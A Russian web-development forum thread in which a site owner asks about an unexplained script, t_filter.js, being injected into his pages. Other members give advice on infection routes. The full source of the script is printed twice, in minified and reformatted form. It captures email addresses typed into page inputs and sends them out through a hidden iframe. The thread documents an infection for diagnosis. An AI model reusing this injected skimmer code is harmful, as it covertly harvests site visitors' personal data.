Неизвестный скрипт / HTML, JavaScript, VBScript, CSS

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Неизвестный скрипт

7 сообщений из 7, страница 1 из 1

Неизвестный скрипт

#39353896

mentol

Гость

Добрый день!
Сегодня заметил непонятно откуда взявшийся скрипт <script src="/vgttkru/t_filter.js" async="" type="text/javascript"></script>

Он прописывается автоматически на создаваемых или редактируемых страницах сайта. Открывается по ссылке http://moskwa.rpk-service.su/vgttkru/t_filter.js

Внутри код:
(function(){function g(a,b){var c=a.createElement("script");c.type="text/javascript";c.async=!0;c.src="/vgttkru/t_filter.js";b&&(c.src+="?"+b);a.body.appendChild(c)}function m(a){return"/vgttkru/filter_proxy_iframe.html?q="+a+"/d"+location.hostname}function n(a){try{var b=document.getElementById("vegetatika-frame")||document.createElement("IFRAME");b.src=m(a);b.style.width="0px";b.style.height="0px";b.style.display="none";b.id="vegetatika-frame";document.getElementById("vegetatika-frame")||document.body.appendChild(b)}catch(c){}}
for(var f={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){var b="",c,d,e,g,l,h,k=0;for(a=f._utf8_encode(a);k<a.length;)c=a.charCodeAt(k++),d=a.charCodeAt(k++),e=a.charCodeAt(k++),g=c>>2,c=(c&3)<<4|d>>4,l=(d&15)<<2|e>>6,h=e&63,isNaN(d)?l=h=64:isNaN(e)&&(h=64),b=b+f._keyStr.charAt(g)+f._keyStr.charAt(c)+f._keyStr.charAt(l)+f._keyStr.charAt(h);return b},_utf8_encode:function(a){a=a.replace(/\r\n/g,"\n");for(var b="",c=0;c<a.length;c++){var d=a.charCodeAt(c);
128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b}},e=!!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/),r=document.getElementsByTagName("body")[0].getElementsByTagName("input"),p=0;el=r[p];p++)if("text"==el.type||"email"==el.type||!el.type){var t=el.onblur||function(){},u=el.onkeydown||function(){},q=function(){var a=/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)*(\.[a-z]{2,4})$/i;
this.value&&a.test(this.value)&&n(f.encode(this.value))};el.onblur=function(a){q.call(this);return t(a)};el.onkeydown=function(a){13==("which"in a?a.which:a.keyCode)&&q.call(this);return u(a)}}e&&(e=localStorage.getItem("vg_postponed_dt"))&&(-1!=location.hash.indexOf("#method-post")?(location.hash=location.hash.replace("#method-post",""),n(e)):(localStorage.removeItem("vg_postponed_dt"),window.location.replace(m(e)+"/r"+encodeURIComponent(window.location.href))));setInterval(function(){for(var a=
document.getElementsByTagName("iframe"),b=0;b<a.length;b++)if(!~(" "+a[b].className+" ").indexOf(" __vg__ ")){a[b].className+=" __vg__";try{g(a[b].contentWindow.document)}catch(c){}}},1E3);null!=function(a){var b=document.cookie;a+="=";var c=b.indexOf("; "+a);if(-1==c){if(c=b.indexOf(a),0!=c)return null}else{var c=c+2,d=document.cookie.indexOf(";",c);-1==d&&(d=b.length)}return unescape(b.substring(c+a.length,d))}("vg_do_not_send")&&"undefined"===typeof VG_ALREADY_ABORTED&&(window.VG_ALREADY_ABORTED=
!0,g(document,"do_not_send"))})();

Что это такое и нужно ли убирать, если нужно то как?
Спасибо за внимание))

...

Рейтинг:

0 / 0

24.11.2016, 16:59

| Ответить | Цитировать | Написать

Неизвестный скрипт

#39353987

vkle

Участник

Откуда: Самара

Сообщения: 14 253

Рейтинг: 0 / 0

По моей квартире бегают непонятно откуда взявшиеся существа (фото и видео прилагаются). Они издают какие-то звуки, путаются под ногами, и вообще, лезут абсолютно повсюду. Что это такое и нужно ли убирать, если нужно то как?
Прикольно? Мне - нет. Но Ваш вопрос звучит примерно так же.

Вам этот скрипт нужен? Нет? Убирайте.

Как? Ну, никто же кроме Вас не знает, чем и как Вы редактируете или создаёте страницы. Удаётся ли убрать код этими средствами или нет - тоже не понятно.

Ставьте вопрос иначе: после каких событий появилась эта дрянь, каковы возможные пути её проникновения.
Сам редактор добавляет этот код? Странный какой-то редактор. Если это визивиг из админки сайта, то он вполне может быть "модифицирован".
Может, пароль ФТП скомпрометирован?
Или на сайте давно уже поселился какой-нибудь пхп-шелл?
А может, в дырявый веб-браузер какая зараза залезла?
Может. И ещё есть сотни способов вписать левый контент.

В общем, просто убрать код - это даже не пол-дела, это много меньше. Сегодня уберёте, а завтра он опять появится. Закрыть пути попадания - вот это уже ближе к истине.

...

Рейтинг:

0 / 0

24.11.2016, 18:05

| Ответить | Цитировать | Написать

Неизвестный скрипт

#39354313

mentol

Гость

Нашел кое-что: vegetatika.ru - vgttkru

кеасперским 17 обновленным проверил ничего нет, virusdie тоже ничего не нашел, проверял также встроенным антивирусом reg.ru, какие будут идеи?

...

Рейтинг:

0 / 0

25.11.2016, 09:57

| Ответить | Цитировать | Написать

Неизвестный скрипт

#39354329

вадя

Участник

Откуда: Екатеринбург

Сообщения: 19 399

Рейтинг: 0 / 0

mentol,
сам скрипт безвреден, но он загружает что-то
попробуй обратиться на virusinfo.info

...

Рейтинг:

0 / 0

25.11.2016, 10:14

| Ответить | Цитировать | Написать

Неизвестный скрипт

#39354330

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

Код: javascript

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.

// JavaScript source code
(function () {
    function g(a, b) {
        var c = a.createElement("script");
        c.type = "text/javascript";
        c.async = !0;
        c.src = "/vgttkru/t_filter.js";
        b && (c.src += "?" + b);
        a.body.appendChild(c)
    }
    function m(a) { return "/vgttkru/filter_proxy_iframe.html?q=" + a + "/d" + location.hostname }
    function n(a) {
        try {
            var b = document.getElementById("vegetatika-frame") || document.createElement("IFRAME");
            b.src = m(a);
            b.style.width = "0px";
            b.style.height = "0px";
            b.style.display = "none";
            b.id = "vegetatika-frame";
            document.getElementById("vegetatika-frame") || document.body.appendChild(b)
        } catch (c) { }
    }
    for (
        var f = {
            _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
            encode: function (a) {
                var b = "", c, d, e, g, l, h, k = 0;
                for (a = f._utf8_encode(a) ; k < a.length;) c = a.charCodeAt(k++), d = a.charCodeAt(k++), e = a.charCodeAt(k++), g = c >> 2, c = (c & 3) << 4 | d >> 4, l = (d & 15) << 2 | e >> 6, h = e & 63, isNaN(d) ? l = h = 64 : isNaN(e) && (h = 64), b = b + f._keyStr.charAt(g) + f._keyStr.charAt(c) + f._keyStr.charAt(l) + f._keyStr.charAt(h); return b
            },
            _utf8_encode: function (a) {
                a = a.replace(/\r\n/g, "\n");
                for (var b = "", c = 0; c < a.length; c++) {
                    var d = a.charCodeAt(c);
                    128 > d ? b += String.fromCharCode(d) : (127 < d && 2048 > d ? b += String.fromCharCode(d >> 6 | 192) : (b += String.fromCharCode(d >> 12 | 224), b += String.fromCharCode(d >> 6 & 63 | 128)), b += String.fromCharCode(d & 63 | 128))
                }
                return b
            }
        },
        e = !!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/),
        r = document.getElementsByTagName("body")[0].getElementsByTagName("input"),
        p = 0;
        el = r[p];
        p++
     )
    if ("text" == el.type || "email" == el.type || !el.type) {
        var t = el.onblur || function () { }, u = el.onkeydown || function () { },
            q = function () {
                var a = /^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)*(\.[a-z]{2,4})$/i;
                this.value && a.test(this.value) && n(f.encode(this.value))
            };
        el.onblur = function (a) {
            q.call(this);
            return t(a)
        };
        el.onkeydown = function (a) {
            13 == ("which" in a ? a.which : a.keyCode) && q.call(this);
            return u(a)
        }
    }
    e && (e = localStorage.getItem("vg_postponed_dt")) && (-1 != location.hash.indexOf("#method-post") ? (location.hash = location.hash.replace("#method-post", ""), n(e)) : (localStorage.removeItem("vg_postponed_dt"), window.location.replace(m(e) + "/r" + encodeURIComponent(window.location.href))));
    setInterval(
        function () {
            for (var a = document.getElementsByTagName("iframe"), b = 0; b < a.length; b++)
                if (!~(" " + a[b].className + " ").indexOf(" __vg__ ")) {
                    a[b].className += " __vg__";
                    try { g(a[b].contentWindow.document) } catch (c) { }
                }
        }, 1E3
    );
    null != function (a) {
        var b = document.cookie;
        a += "=";
        var c = b.indexOf("; " + a);
        if (-1 == c) {
            if (c = b.indexOf(a), 0 != c) return null
        } else {
            var c = c + 2, d = document.cookie.indexOf(";", c); -1 == d && (d = b.length)
        }
        return unescape(b.substring(c + a.length, d))
    }
    ("vg_do_not_send") && "undefined" === typeof VG_ALREADY_ABORTED && (window.VG_ALREADY_ABORTED =! 0, g(document, "do_not_send"))
})();

...

Рейтинг:

0 / 0

25.11.2016, 10:14

| Ответить | Цитировать | Написать

Неизвестный скрипт

#39354345

Zenia

Участник

Откуда: Литва

Сообщения: 396

Рейтинг: 0 / 0

Судя по всему у вас в WordPress движке завелись червячки, надо правильно искать https://yandex.ru/search/?text=wordpress virus&lr=11477

А вообще плохо это, когда, люди пользуются такими мощными фреймворками и при этом не разбираются хотя бы даже в PHP

...

Рейтинг:

0 / 0

25.11.2016, 10:29

| Ответить | Цитировать | Написать

Неизвестный скрипт

#39354399

Изопропил

Участник

Сообщения: 33 046

Рейтинг: 0 / 0

ZeniaА вообще плохо это, когда, люди пользуются такими мощными фреймворками и при этом не разбираются хотя бы даже в PHP
вообще-то так задумано )))

...

Рейтинг:

0 / 0

25.11.2016, 11:12

| Ответить | Цитировать | Написать

7 сообщений из 7, страница 1 из 1

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Неизвестный скрипт

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=22&tid=1444886]:	0ms
get settings:	10ms
get forum list:	13ms
check forum access:	4ms
check topic access:	4ms
track hit:	174ms
get topic data:	13ms
get forum data:	3ms
get page messages:	49ms
get tp. blocked users:	2ms
others:	276ms

total:	548ms